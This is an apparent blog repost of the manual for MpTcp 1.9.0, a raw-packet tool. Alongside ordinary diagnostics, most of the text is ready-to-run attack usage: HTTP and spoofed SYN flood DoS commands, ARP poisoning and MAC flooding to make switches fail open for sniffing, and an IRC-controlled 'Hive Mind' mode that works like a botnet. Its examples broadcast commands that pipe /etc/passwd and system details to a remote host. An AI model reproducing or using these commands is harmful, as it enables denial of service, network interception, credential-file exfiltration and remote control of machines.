New version of MpTcp released: Mptcp 1.9.0 : -(TCP/IP Packet Manipulator and RSOI Handler) | BOT24

New version of MpTcp released: Mptcp 1.9.0 : -(TCP/IP Packet Manipulator and RSOI Handler)


   Mpctp is a tool for raw packets manipulation that allows a large number of
   options. Its primary purpose is diagnose and test several scenarios that
   involving the use of TCP/IP packets. It's capable to send packets to any
   target type (like hostnames, IPs and MAC address) and manipulate many
   fields and headers like: Source/Destination IP address,
   Source/Destination MAC address, TCP flags, ICMP types, TCP/UDP/ICMP packet
   size, payloads ARP/RARP, etc.

   Mptcp is also able to be managed over the RSOI mode
   (Remote System over IRC), where the software can surrender all control and
   machine resources to one channel on an remote IRC server.
   Also, too many types of network based attacks (like packet attacks) also
   are handled by MpTcp.

New version of MpTcp released: Mptcp 1.9.0 : 
Full support for the systems: FreeBSD, Linux and Darwin MACOS (iPhone, iPad, running iOS-3. *, IOS-4. *, IOS-5. * and IOS-6 . *). Here Cahngelog complete with new changes. Fragicmp new build (fragicmp 0.2). I added two more explanations on two projects: Cript and z-Ory Project Protocol . Crypt is a simple encryption tool for Win32 systems.The Ory Protocol-z is a professional development I used for a proprietary tool called Z-Update , which came to describe the algorithm here. Already in the profile separated some pictures dedicated to Sport Club Internacional . Khun ...) .



   [-d destination] [-s source] [-p port] [-P source_port] [-q number_packets]
   [-F delay] [-n number_threads] [-x buffer_size] [-t ttl] [Ie] [IE] [Id] [Iq]
   [Im] [-M mask] [lI] [Tc] [Ts] [Ta] Tf] [Tr] [Tp] [Tx] [Tn] [-lT <-P port>]
   [-lC <-P port>] [-lU <-P port>] [-i interface] [-H destination_mac]
   [-h source_mac] [-a ip_address] [-f number_packets] [-r ip-ip]
   [-e ip_address] [lA] [-N irc_server] [-L irc_channel] [-G channel_password]


              <Global> Options:

   -d <destination>    -->  Destination address
   -s <source>         -->  Source address
   -p <port>           -->  Destination port (Remote)
   -P <source port>    -->  Source port (Local)
   -i <interface>      -->  Interface option
   -q <number packets> -->  Number packets to send
   -x <packet size>    -->  Sets the packet size
   -t <ttl>            -->  TTL option
   -c                  -->  Continuous mode (1 second delay)
   -F <delay>          -->  Flood mode (delay on microseconds)
   -b                  -->  Super flood. More hard flood delay (CAUTION)
   -z                  -->  Ignore replies
   -n <number threads> -->  Number of threads
   -D                  -->  Display the packet content (only received packets)
   -v                  -->  Print software version
   --help              -->  Print this screen and exit

              <ICMP> Options:

   -Ie                 -->  ICMP packet Echo Request (Ping)
   -IE                 -->  ICMP packet Echo Reply
   -Id                 -->  ICMP packet Information Request
   -It                 -->  ICMP packet Timestamp Request
   -Iq                 -->  ICMP packet Source Quench
   -Im                 -->  ICMP packet Mask Request
   -M <Mask>           -->  ICMP packet Mask Reply (Mask Form: -M
   -lI                 -->  ICMP Listem Mode. Listen for incoming ICMP packets

              <TCP> Options:

   -Tc                 -->  TCP simple connection
   -Ts                 -->  TCP SYN packet
   -Ta                 -->  TCP ACK packet
   -Tf                 -->  TCP FIN packet
   -Tr                 -->  TCP RST packet
   -Tp                 -->  TCP PUSH packet
   -Tx                 -->  XMAS (TCP flags FIN-PSH-URG on)
   -Tn                 -->  NULL (All TCP flags off)
   -lT <-P port>       -->  TCP listen mode. Listen for incoming TCP packets
   -lC <-P port>       -->  TCP listen connections. Wait for TCP connections

              <UDP> Options:

   -u                  -->  UDP mode (UDP packets)
   -lU <-p Port>       -->  UDP listen mode. Listen for incoming UDP packets

              <ARP/RARP> Options:

   -H <mac address>    -->  Destination MAC address (Eg: -H xx:xx:xx:xx:xx:xx)
   -h <mac address>    -->  Source MAC address (Use: -h xx:xx:xx:xx:xx:xx)
   -R                  -->  Sets packet to RARP mode (Default as ARP)
   -A                  -->  Sets ARP/RARP packet to REQUEST (Default REPLY)
   -a <ip address>     -->  Arp'ping (ping ARP mode - bypass ICMP filters)
   -f <number packets> -->  Mac flooding: Massive flood of spoofed ARP packets
   -r <ip_addr-ip_addr>-->  ARP Cannon: Send ARP packets on a given range IP
   -e <ip address>     -->  Exception IP: Excludes ip address from ARP Cannon
   -lE                 -->  ARP/RARP listen mode. Listen for ARP/RARP packets

              <WEB Stress Test (DoS)> Options:

   -U                  -->  UDP stress test
   -C                  -->  TCP connections stress test
   -W                  -->  HTTP (GET request) stress test
   -B                  -->  ICMP stress test
   -S                  -->  TCP SYN packets stress test
   -K                  -->  TCP ACK packets stress test
   [INFO] Use the -p <port> to set other than port 80 (default as port 80)

              <HIVE MIND - Mass Remote Control>
                RSOI - Remote System over IRC

   -N <irc server>     -->  IRC network to self remote control (RSOI mode)
   -L <irc channel>    -->  IRC channel. Use: -L channel (without #)
   -G <password>       -->  IRC channel's password (optional if required)


              <GLOBAL Options>
   -d <destination>
      Destination host (hostname or IP address).
   -s <source>
      Source host (hostname or IP address). If -s <host> option is not
      specified, the MpTcp assumes the IP address found by the first interface
      defined in the system: (eth0, eth1, eth2, etc...) ordinarily.
   -p <port>
      Destination port (remote port).
   -P <source port>
      Source port (local port).

   -i <interface>
      Specifies the interface option. (Eg: -i eth0)

   -q <number packets>
       Number of packets to send.

   -x <packet size>
      Sets the packet size. The package size can not be larger than 1470 bytes
      or larger than defined system MTU (eg: MTU=1500).
   -t <ttl>
      Sets the TTL field.

      Continuous mode. Send packets without interruption with regular interval
      of 1 (one) second between the shoots.

   -F <delay>
      Flood option. Set the time <delay> between the shoots (in microseconds).
      The -F option cannot be used with -c or -b options.

      Super flood. This option puts MpTcp optimized to send the largest number
      of packets in a short amount of time [CAUTION].
      Don't wait for replies. Ignore packet responses.

   -n <number threads>
      Number of threads to use on send option.

      Display the packet content on received packets (tcpdump style).
      Print the version.
      Print the initial help page with arguments.
             <ICMP Options>

      Send an ICMP packet Type 8 (Echo Request). The target will respond with
      an ICMP packet Type 0 (Echo Reply) if it is alive.
      Send an ICMP packet Type 0 (Echo Reply).
      Send an ICMP packet Type 15 (Information Request).
      Send ICMP packets Type 13 (Timestamp Request).
      Send ICMP packets Type 4 (Source Quench).
      Send ICMP packets Type 17 (Mask Request). If target is configured to
      reply a request mask, a MaskReply pscket will be received with the Mask.
   -M <Mask>
      Send ICMP packets Type 18 (Mask Reply). The <Mask> argument is the mask
      defined to packet. (Eg: -M
      ICMP Listen Mode. Listen for incoming ICMP packets. Any ICMP packet
      "unicast" will be captured.
             <TCP Options>

      Simple TCP connection to target. The option -p port is required. This
      option uses connect() routine for synchronization.
      Send a TCP SYN packet (TCP packet with the SYN bit on).
      Send a TCP ACK packet (TCP packet with the ACK bit on).
      Send a TCP FINAL packet (TCP packet with the FIN bit on).
      Send a TCP RESET packet (TCP packet with the RST bit on).
      Send a TCP PUSH packet (TCP packet with the PSH bit on).
      Send a TCP packet XMAS (TCP packet with the FIN-PUSH-URG bits on).

      Send a NULL TCP packet (TCP packet with the NONE bits on.
      All tcp flags off).
   -lT <-P port>
      TCP Listen Mode. Listen for incoming TCP packets. This option need be
       used with option "-P port".

   -lC <-P port>
      Listen for TCP connections. This option need to be used with option
      "-P port". TCP listen mode uses accept() function for synchronization.



             <UDP Options>
      UDP mode.

   -lU <-P port>
      UDP Listen Mode. Listen for incoming UDP packets. This option need be
      used with the option "-P port". The UDP listen mode don't use a stream


              <ARP/RARP Options>

   -H <destination mac>
      Destination MAC address. Option required for ARP packets.
      This option requires a destination IP address. So if "-d <destination>"
      is not given, MpTcp will assumes by default a NULL value on this field
      header. Form: -H AA:DD:CC:22:11:AA.

   -h <source mac>
      Source MAC address. This option requires the source IP address. If
      "-s <source>" is not given, MpTcp assumes by default the first IP
      address defined by the first interface found in the system (eth0, eth1,
      eth2, etc). Form: -h AA:DD:CC:22:11:AA.
      Defines the frame type like RARP packet. All ARP/RARP packets sent by
      MpTcp on the link layer are ARP by default. If "-R" is defined, then
      MpTcp send packets type RARP instead.

      Defines the ARP/RARP frame type like REQUEST packet. The packets sent by
      MpTcp on the link layer are REPLY by default. If "-A" is defined, then
      MpTcp sets the ARP/RARP packets to "REQUEST" type instead.
   -a <ip address>
      Arping Mode. This option sends ARP REQUEST packets to a given IP
      address.The target receives the packet and returns an ARP REPLY packet.
      This option is very useful for probing hosts that filter ICMP pings.
   -f <number packets>
      Mac Flood (CAUTION !!).
      This option sends ARP REPLY packets with SOURCE MAC, DESTINATION MAC,
      SOURCE IP ADDRESS and DESTINATION IP ADDRESS (randomly generated) on
      mode Super Food. If not specified the "-i <interface>" MpTcp takes the
      first valid interface found in the System. Eg usage:
                                # mptcp -f 120000
      This option does a flooding by sending 120000 packets with random IP
      addresses and random MAC addresses. This attack is also called
      MAC FLOODING. Note:

   -r <ip_address-ip_address>
      ARP Cannon (CAUTION !!).
      This option sets MpTcp to send ARP REPLY packets to all defined IP
      addresses inside the range "ip_address-ip_address". This packets will
      have destination MAC address defined to physical broadcast address
      (FF:FF:FF:FF:FF:FF) and source MAC address randomly generated. The
      option range (IP-IP) needs TO BE in the format shown below. Eg:  
                        # mptcp -r
      The above option does a flooding to destination physical broadcast
      FF:FF:FF:FF:FF:FF, saying to network enlace that all IP adresses in the
      range " to" will have source MAC addresses randomly
      generated. This attack is also called MASSIVE ARP POISONING. This action
      probally TAKE DOWN for moments all IP addresses defined in the range

   -e <ip address>
      This option exclude the "ip address" from option ARP CANNON (-r ip-ip)
      above defined. Eg:
                  # mptcp -r -e
      The above option will exclude the IP address "" from
      ARP CANNON attack.

      Listen for incoming ARP/RARP packets on link layer.


             <WEB Stress Test Options>
      UDP attack.
      Send UDP packets on flood mode to HTTP host (default: Port 80).
      TCP connections attack.
      Does TCP connections to HTTP host (default: Port 80).
      WEB HTTP attack.
      Send HTTP requests (GET) on flood mode to HTTP host (default: Port 80).
      ICMP attack.
      Send ICMP packets on flood mode to HTTP host.
      (Also called Death Ping).
      TCP SYN attack.
      Send TCP SYN packets on flood mode to HTTP host (default: Port 80).
      Also called SYN Flood attack.
      TCP ACK attack.
      Send TCP ACK packets on flood mode to HTTP host (default: Port 80).

   INFO: Use the option -p <port> to set other port than 80.

             <HIVE MIND (Mass Remote Control) Options>
                   RSOI - Remote System over IRC

   -N <IRC server>
      IRC network to connect. Option is required to put MpTcp on RSOI mode.

   -L <IRC channel>
      IRC #channel to connection.
      The channel must be defined without "#" character, where only the
      "IRC channel" must be filled. If this option is not given, then MpTcp
      will join on #mptcp channel by default.
   -G <password>
      IRC channel's password (if exists). If this option is not given, then
      MpTcp will type the password's channel like "mptcp0" by default.


   # mptcp -d hexcodes -Ie
      Send an ICMP packet (Echo Request) to host "hexcodes".

   # mptcp -lI
      ICMP listen mode. Listen for ICMP packets like PINGs.

   # mptcp -It -d -c
      Send ICMP packets (Timestamp Request) on continuous mode to server

   # mptcp -s -d -u -p 4140
      Send an empty UDP packet with spoofed source ip "" to host
      "hexcodes" on port 4140.

   # mptcp -d -u -p 9000 -P 22000 -F 900 -q 20
      Send only 20 UDP packets to server "" and to port 9000,
      from source port 22000 with flood Delay of 900 miliseconds.

   # mptcp -d -Ie -x 512 -t 50 -z
      Set MpTcp for send ICMP packets (Echo Request) with size of 512 bytes
      to host "" with TTL 50. Don't wait for ICMP Echo ReplY.

   # mptcp -lU -P 59
      Listen UDP packets on local port 59 (all addresses and loopback).

   # mptcp -d hexcodes -Ts -p 6000
      Send a TCP SYN packet to host "hexcodes" on port 6000.

   # mptcp -lC -P 12345 > file.txt
      Listen TCP connections on local port "12345", and write the received
      data on file 'file.txt'.

   # mptcp -d hexcodes -p 12345 < /etc/hosts
      Connect to host 'hexcodes' reading the file '/etc/hosts. The file
      content will be send over the TCP connection (netcat style).
   # mptcp -lT -P 2134 -D
      Listen for TCP packets on local port "2134" and show the packet content.

   # mptcp -d -Tr -p 8080 -n 12 -b
      Send TCP RST packets to server "" on port 8080, with 12
      threads and super flood mode (HOT).

   # mptcp -H FF:FF:FF:FF:FF:FF
      Send an ARP REPLY packet to physical Broadcast FF:FF:FF:FF:FF:FF. (The
      source MAC address and the source IP address will be obtained locally
      by the active interface. The destination IP address will be NULL).

   # mptcp -i eth2 -h 00:BB:AA:CC:BB:AA -H FF:FF:FF:FF:FF:FF -d -A
      Send an ARP REQUEST packet by the eth2 interface with source MAC
      00:BB:AA:CC:BB:AA, to destination physical Broadcast FF:FF:FF:FF:FF:FF,
      asking "Who ??" on the network have the IP address "". The IP
      "" (if alive) will respond with an ARP REPLY filled with its
      own MAC/IP address pair.

   # mptcp -s -h 00:CC:AA:CC:BB:AA -H FF:FF:FF:FF:FF:FF
      Send an ARP REPLY packet to destination physical Broadcast
      FF:FF:FF:FF:FF:FF saying that the source IP address "" have
      now the MAC address 00:CC:AA:CC:BB:AA. (Caution: This option changes
      the ARP cache table. Possible ARP poisoning attack).

   # mptcp -a
      Send an Arp'ing packet to Host "". If the host hardware is
      alive on network or LAN, by default an ARP REPLY will be returned.
      Otherwise, nothing happens. This option can be used to bypass ICMP
      filters (PING filters).

   # mptcp -f 250000
      Send 250000 ARP REPLY packets (to physical broadcast) with the
      ADDRESSESS) randomly generated.

   # mptcp -lA -D
      Listen for ARP/RARP packets. Does a listen action for all incoming
      ARP/RARP packets on link layer, and show the packet content.

   # mptcp -N -L Cybers
      Sets the MpTcp to connect on IRC Server "" on channel
      #Cybers. This option puts MpTcp on the RSOI mode. So, the MpTcp
      will be NO AVAILABLE to be controled by user. Only the users on IRC
      server "" channel #Cybers can do this.

   # mptcp -d -W -n 40
      Sets the MpTcp to "WEB Stress Mode". This option puts MpTcp to send HTTP
      requests (GET method) on super flooding mode to host "" on port
      80 (WEB HTTP) with 40 threads. This stress test attempts to exhaust the
      services on port 80 (Web Server) and check the target's limit response.



                                 [WHITE SIDE]

       Connections or packet manipulation to any port or destination

   MpTcp can connect or send packets to any destination or port. You can use
   this option to diagnose a port (listening or not) or check if a host is
   responding as expected by sending many pre-builting packets. Eg:

   # mptcp -d -p 1024 -Tc
      Does a simple TCP connection to host on port 1024.

   # mptcp -d -p 20080 -u
      Send an UDP packet to host on port 20080.

   # mptcp -d -p 80 -Ts -c
      Send TCP SYN packets to host on port 80. If the port is open,
      then a packet type TCP [ACK] will be returned. If this port is not
      opened, usually a TCP [RST] packet is returned (port scan).

   Listen on any port (TCP and UDP) or listen for ICMP and ARP/RARP packets

   MpTcp can listen on any port (UDP and TCP) or listen for ICMP or ARP/RARP
   packets. This option can be used to simulate a listen port supposedly given
   by a software, and verify the connection requests or data incoming in this
   same port. The MpTcp can does listen for incoming ICMP data like: pings,
   replies, source quenchs, etc.
   The MpTcp also does listen on link layer level, capturing ARP/RARP packets
   (Requests and Replies).

   # mptcp -lC -P 20
      Sets mptcp to listen connections on local port 20 (TCP).

   # mptcp -lU -P 1030
      Sets mptcp to listen on local port 1030 (UDP).

   # mptcp -lT -P 16 -s
      Sets mptcp to listen on local port 16 (TCP packets) only binded on the
      address "".

   # mptcp -lI -D
      Sets mptcp to listen ICMP data and show the packet content. All incoming
      ICMP packets will be captured. This option is useful to display incoming

   # mptcp -lA
   Sets mptcp to listen data on the link layer. This option will will capture
   incoming ARP and RARP packets. This is useful to display ARP/RARP REQUESTS
   or REPLIES packets they cross the network.

                    Able to run like a FTP Connection

   MpTcp is capable to run like FTP (over TCP Connection). It can listen at
   a given port, so reading/writing data on a send/received connection (like
   Netcat style). The data transfered can be BINARY or TEXT, whatever. Look:
   This mode is also compatible with Netcat modes (listeners and senders).

                           (Server Side: On hexcodes host)
   # mptcp -lC -P 2200 > hosts.txt
      Listen on local port 2200 and write the received data to file

                           (Client Side: From any host)
   # cat /etc/hosts | mptcp -d hexcodes -Tc -p 2200
      Does a connection to host 'hexcodes', and reads the file '/etc/hosts',
      to transfer the data content to remote host. The remote host 'hexcodes'
      will write the transfered data content on the hosts.txt file.

   Another example:

                           (Server Side: On hexcodes host)
   # mptcp -lC -P 900 <
     Listen on local port 900, and reads the binary content data of file
     '' to transfer on the next accepted connection.

                           (Client Side: From any host)
   # mptcp -d hexcodes -Tc -p 900 >
     Sets the MpTcp to connect the host 'hexcodes' on remote port 900, and
     read the binary incoming data content to write into the ''

                           Arping - Alternative Ping

   MpTcp can send ARP REQUEST packets to certain destinations in order to
   diagnose whether they are alive on the network. By default, the MAC
   interface of the host that receives an ARP REQUEST packet must return an
   ARP REPLY informing your MAC/IP pair. This option is very useful for
   diagnosing whether a host is alive on the network when the host filter ICMP
   packets and does  not accept pings ICMP. Therefore, the arping mode can be
   used to bypass the firewall that filter ICMP packets.

   # mptcp -a
      Send an ARP'ING to host "". If the host is alive on
      network, then it will respond with an ARP REPLY packet.

                                  [DARK SIDE]

                    DOS and DDoS based attacks (over Web Stress)

   Since version 1.7, the mptcp enabled stress test of network based attacks.
   These attacks are able to attempt to exhaust the services on port 80
   (Web Server) and verify the target's limit. If many clients of MpTcp run
   these routines at the same time and targeted to a single server, then this
   server may fail in their services or become unavailable while the attack
   lasts (DDoS). Eg:

   # mptcp -d -W -n 20
     Sets the mptcp to "Stress Test mode", where the MpTcp will send many
     shootings on super flooding mode to server "" on port 80
     (Default WEB Service), and with 20 threads. This option will give a great
     overhead on target where it will try to exhaust the services WEB based.
     The threads usage also can to intensify the attack. The number of threads
     above ~20 on -W option, from many sources and with a large link can
     define a complete target's 'denial of services' (DoS).

                             Mac and IP Spoofing

   MpTcp can send packets with Source IP address and Source MAC address
   spoofed. MpTcp can generate ICMP, TCP (syn, ack, rst, fin, push, null bits
   and xmas bits on), UDP packets and ARP/RARP (Request and replies) with
   source IP address filleds to any value. It can also set any value in the
   source MAC address. Eg:

   # mptcp -d -p 890 -Ts -s
      Send a TCP packet (bit syn on) to address "" on port 890 and
      with source IP address defined (spoofed) to "".

   # mptcp -s -d -p 9000 -u -c
      Send UDP packets to address "" on port 9000 and with source
      IP address defined to NULL "".

   # mptcp -d -Ie -z -F 1000 -s
      Send ICMP packets (Echo Request - PING) to address "" with
      Source IP address defined to "". This shoot don't wait by
      the Echo Reply (-z option) and does a flooding with a delay time of 1000
      microseconds (-F option).

   # mptcp -H FF:FF:FF:FF:FF:FF -h 00:00:00:00:00:00
      Send an ARP REPLY packet to physical BROADCAST (FF:FF:FF:FF:FF:FF)
      saying that your source IP address have now MAC address
      00:00:00:00:00:00. On this option, the sender host will stop receiving
      and sending packets, and it will be isolated for a few seconds (Out of

                                Massive Flood

   MpTcp can send any of its options (ICMP, TCP, UDP, and ARP-RARP) with
   "Flood Delay" or "Super Flood" modes. The Flood Delay option sets the
   interval of shoots in microseconds, and can send packets in a very low range
   of time. The "Super Flood" is more hard because it ignores the packet reply
   and its optimization has focused to sending a large number of packets per
   second. In certain environments can cause a DoS (Denial of Service) and
   cripple the host communication. These options need be used CAREFULLY, cause
   they may cause unavailability of the target's services or the complete
   unavailability of the network's target.

   # mptcp -d -Ie -b
      Send ICMP packets type Echo Request (PING) to server ""
      on super flood mode.

   # mptcp -d -p 900 -u -b -x 1300
      Send UDP packets (super flood mode) to host "" on port 900 with
      packet size of 1300 bytes.

   # mptcp -d -Iq -F 10
      Send ICMP packets (Source Quench type) to host "" and with flood
      delay of 10 microseconds. This packet type can decrease the flow of

   # mptcp -d -s -p 80 -Ts -F 1 -z
      Send TCP SYN packets to host on port 80, with source IP address defined
      to "" and with flood delay of 1 microsecond. This option don't
      wait for replies. This attack is also named "Syn Flood (spoofed)".

                               ARP Poisoning
   MpTcp send packets at the link layer and previously can define the source
   and destination MAC addresses. MpTcp can manipulate the source MAC address
   and the source IP address, so can change the ARP cache table of neighbors
   on the network, causing a DoS or a pre-manipulation of data forwarding to
   others destinations. A characterization of this kind of action is known as
   MITM (Man In The Midle), where you can change the ARP table of your
   neighbors, making them believe they are sending to gateway, where the
   gateway will be the poisoning sender.

   # mptcp -H FF:FF:FF:FF:FF:FF -s -h AA:BB:CC:DD:EE:FF
      Send an ARP REPLY packet to physical BROADCAST saying that the
      source IP address "" have now MAC address AA:BB:CC:DD:EE:FF. If
      the address "" is alive on the network, then it will be
      unavaiable for minutes on state of offline for physical comunication.

   # mptcp -H FF:FF:FF:FF:FF:FF -h 00:00:00:00:00:00 -s -i eth0 -c
      Send successively ARP REPLY packets to physical BROADCAST by the eth0
      interface, and saying that source host "" have now the MAC
      address 00:00:00:00:00:00. This option leave the host "" offline
      while the shoots are going.

      MAC Flooding - Buffer overflow on the Switch's ARP Table (CAM TABLE)

   MpTcp brings the specific option of ARP Flood (MAC FLOODING). This option is
   controversial, but may well be used for multiple purposes. The option
   "-f <num packets>" of MpTcp sends <num packets> to physical BROADCAST with
   Source and Destination MAC addresses randomly generated, and Source and
   Destination IP addresses randomly generated. The intent of this type of
   transmission is overloading the temporary ARP cache table that the switches
   holds. Doing this type of shooting in a massive mode, you can exhaust the
   memory buffer storage table of the switchs, which it will enter in
   "Fail Open" mode. On this stage, the switch will send all packets to all
   ports on device (HUB mode), facilitating a process of sniffer NO-UNICAST
   of any host on the network.

   # mptcp -f 140000
      Sets mptcp to send 140000 ARP REPLY packets to physical BROADCAST with
      source and destination MAC address, source and destination IP address
      generated randomly. If the memory buffer of the switch (CAM Table) is
      less than 140000, then the switch will enter on "Fail Open mode".

                                [HIVE MIND]
                          (Mass Remote Control)

                       RSOI - Remote System over IRC

   Since version 1.7, MpTcp enabled the RSOI (Hive Mind) option for external
   use. This control is managed by an IRC channel, where a central controller
   through commands given on the arbitrary channel of an IRC server can
   remotely control all the clients (MpTcp) connected to this channel. This
   option can only be used through an IRC network, cause MpTcp was developed
   waiting a communication over an IRC protocol.

   Inside this option, the user no more have control over the tool, giving all
   and all control to IRC #channel. In other words, using RSOI mode you
   surrender control of MpTcp and ALL SELF MACHINE to all on IRC #channel, who
   can manipulate it and use all local resources of host without any

   This option is DANGEROUS, and sometimes can sounds like a backdoor or maybe
   surrender yourself by remote control.
   Obviously, i don't care about this idea.

   Otherwise, is useful (for example) for:

   -> To Check the limit link of remote host, where a controller may join many
   users at a channel, and then with a single shoot to make all the MPTCPs
   clients at same time responding to this command, triggering packets to a
   specific target and checking the loading limitations.

   -> FTP mode, using the IRC channel to management specific files transfer
   over trusted machines.


                        # mptcp -N
      (If no channel is giving, default #mptcp channel is used)
      (If no password is giving, default mptcp0 channel's password is used)

   - The option above sets MpTcp to enter on IRC Server "" on
   channel #mptcp (default). After action, mptcp will NOT accept any command
   from user, where MpTcp only will responds to commands that arrive from
   "" on #mptcp. If many MpTcp clients are on channel in
   this moment, then the general controller will be able to control all MPTCPs
   clients by your self command. Absolutely, all MpTcp will respond to it.

                 # mptcp -N -L Cybers
              (#Cybers channel defined on MpTcp connection)


            # mptcp -N -L Cybers -G pass
     (Password "pass" defined to #Cybers channel on MpTcp connection)


   After connected to IRC, the channel can send commands to ALL MpTcp clients.
   These commands need be a specific syntax to differentiate it from normal
   text typed on channel. MpTcp only understand commands prefixed by syntax:
   Ie, everything that comes after this syntax will say to all MpTcp clients to
   see this like an execution command.

   @!~ mptcp -d -Ie
       That says to ALL MpTcp clients connected on the channel to send an ICMP
       Echo Request (Ping) to "" server.

   Another example. Sounds like a blind query:

   @!~ cat /etc/hosts
       This command (sent by the #channel) tells to all MpTcp clients run the
       "cat" command on /etc/passwd file.
       The result WILL BE NOT SHOWED on IRC channel.

   One more example, and SO MUCH MORE DANGEROUS ( ...):

          @!~ cat /etc/passwd | mptcp -d -Tc -p 123

   This command (sent by the #channel) tells to all MpTcp clients run a
   "cat" command on /etc/passwd file and send result to remote host
   'hexcodes'. If the 'hexcodes' host is listening on port 123 with MpTcp or
   Netcat (ie), the content of /etc/passwd file will be transfered.

   So, we don't need spawn a shell, cause we already have one dedicated shell
   under RSOI mode across the IRC channel.

          @!~ ls -al /etc | mptcp -d -Tc -p 123

          @!~ whoami | mptcp -d -Tc -p 123

          @!~ uname -a | mptcp -d -Tc -p 123

          @!~ grep root /etc/passwd | mptcp -d -Tc -p 123



   MpTcp need superuser privileges (root) for operation and execution. DO NOT
   use the stick bit to allow root privilegies. This is not recommended and
   may allow involuntary or agressive DoS/DDoS attacks. The privileged MpTcp
   use also allows users manipulate the ARP cache table of neighbors on
   network, or put the system over a remote control.



   MpTcp is available to anyone who wants to know, manipulate, or disassembly
   the tool. MpTcp is licensed under GPL and Free Software Foundation. A copy
   of the license accompanies the software.
   Licensed under GPL 3 - Copyright (C) Felipe Ecker.
   MpTcp can be freely downloaded here:

                                  Thank you.

                    Felipe Ecker (Khun) <>

Click on the following link to garner additional info.....

Share on Google Plus

About Bradley Susser

    Blogger Comment
    Facebook Comment


Post a Comment